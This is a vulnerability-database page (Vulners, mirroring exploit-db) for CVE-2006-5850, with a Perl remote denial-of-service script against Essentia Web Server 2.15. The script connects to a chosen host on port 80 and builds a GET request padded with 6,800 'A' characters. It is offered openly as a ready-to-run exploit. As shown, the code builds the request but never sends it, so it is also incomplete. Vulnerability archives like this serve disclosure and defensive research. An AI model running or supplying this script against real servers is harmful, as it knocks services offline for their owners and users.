Lucene search
+L

Essentia Web Server 2.15 - GET Remote Denial of Service

🗓️ 04 Nov 2006 00:00:00Reported by CorryLType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 28 Views

Essentia Web Server 2.15 Remote Denial of Service exploi

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2006-5850
10 Nov 200602:00
cve
cvelist
Cvelist
CVE-2006-5850
10 Nov 200602:00
cvelist
exploitdb
Exploit DB
Essentia Web Server 2.1 - 'URL' Remote Buffer Overflow
4 Jul 200300:00
exploitdb
nvd
NVD
CVE-2006-5850
10 Nov 200602:07
nvd
#!/usr/bin/perl


use IO::Socket;

use Getopt::Std; getopts('h:', \%args);



if (defined($args{'h'})) { $host = $args{'h'}; }

print STDERR "\n-=[ Essentia Web Server 2.15 Remote DOS Exploit]=-\n";

print STDERR "-=[ Discovered By CorryL          [email protected] ]=-\n";

print STDERR "-=[ Coded by CorryL     info:www.x0n3-h4ck.org ]=-\n\n";

if (!defined($host)) {

print "usage: perl " . $0 . " -h HOST\n";

exit();
}

$dos = "A"x6800;

print "[+] Connect to $host\n";

$socket = new IO::Socket::INET (PeerAddr => "$host",

                               PeerPort => 80,

                               Proto => 'tcp');

                               die unless $socket;

print "[+] Sending DOS byte\n";

         $data = "GET /$dos \r\n\r\n";

# milw0rm.com [2006-11-04]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.07231
28